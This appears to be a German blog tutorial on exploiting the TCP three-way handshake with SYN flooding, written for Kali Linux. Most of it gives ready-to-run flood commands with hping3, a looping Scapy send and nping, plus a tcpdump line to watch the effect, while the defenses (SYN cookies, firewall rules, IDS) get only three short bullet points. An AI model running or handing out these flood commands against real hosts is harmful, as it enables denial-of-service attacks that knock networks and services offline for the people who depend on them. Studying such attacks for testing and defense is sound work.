3-Way-TCP-Handshakes mit SYN-Flooding-Angriffen prüfen
Einführung
Der TCP-3-Wege-Handshake ist ein grundlegender Mechanismus zur Herstellung einer TCP-Verbindung zwischen Client und Server. Angreifer können diesen Prozess jedoch durch SYN-Flooding-Angriffe ausnutzen, um Netzwerke zu stören oder lahmzulegen. In diesem Beitrag wird gezeigt, wie man mithilfe von Kali Linux Tools einen SYN-Flooding-Angriff durchführen kann.
Grundlagen des SYN-Flooding
Der TCP-3-Wege-Handshake besteht aus drei Schritten:
- SYN: Der Client sendet ein Synchronisationspaket (SYN) an den Server.
- SYN-ACK: Der Server antwortet mit einem SYN-ACK-Paket.
- ACK: Der Client bestätigt mit einem ACK-Paket.
Beim SYN-Flooding sendet der Angreifer kontinuierlich SYN-Pakete, ohne die Verbindung abzuschließen. Der Server hält Ressourcen für die unvollständigen Verbindungen bereit, was zu einer Überlastung führen kann.
Durchführung eines SYN-Flooding-Angriffs mit Kali Linux
Mit hping3
hping3 ist ein Tool zum Senden benutzerdefinierter TCP/IP-Pakete.
sudo hping3 -S --flood -V <Ziel-IP>Optionen:
-S: Setzt das SYN-Flag.--flood: Sendet Pakete ohne Pause.-V: Verbose-Ausgabe für detaillierte Informationen.
Mit Scapy
Scapy ermöglicht das Erstellen und Senden von Paketen in Python.
sudo scapyIn der Scapy-Konsole:
send(IP(dst="<Ziel-IP>")/TCP(flags="S"), loop=1, verbose=0)Parameter:
dst: Ziel-IP-Adresse.flags="S": Setzt das SYN-Flag.loop=1: Sendet Pakete in einer Schleife.verbose=0: Deaktiviert Ausgaben.
Mit nping (Teil von Nmap)
nping ist ein Tool zum Generieren von Netzwerkpaketen und zur Messung der Netzwerkkonnektivität.
sudo nping --tcp -p <Ziel-Port> --flags syn -c 1000000 <Ziel-IP>Optionen:
--tcp: Verwendet TCP-Protokoll.-p: Zielport.--flags syn: Setzt das SYN-Flag.-c: Anzahl der Pakete.
Überprüfung des Angriffs
Mit Tools wie Wireshark oder tcpdump kann der Netzwerkverkehr überwacht werden, um den Effekt des SYN-Flooding zu beobachten.
sudo tcpdump -n -i <Netzwerkschnittstelle> tcp port <Ziel-Port> and tcp[tcpflags] & (tcp-syn) != 0Sicherheitsmaßnahmen
Um sich gegen SYN-Flooding zu schützen, können folgende Maßnahmen ergriffen werden:
- Aktivieren von SYN-Cookies.
- Implementierung von Firewall-Regeln, die verdächtigen Traffic filtern.
- Nutzung von Intrusion Detection Systems (IDS).
Tags
SYNFloodingTCPHandshakeKaliLinuxNetzwerksicherheithping3Scapynping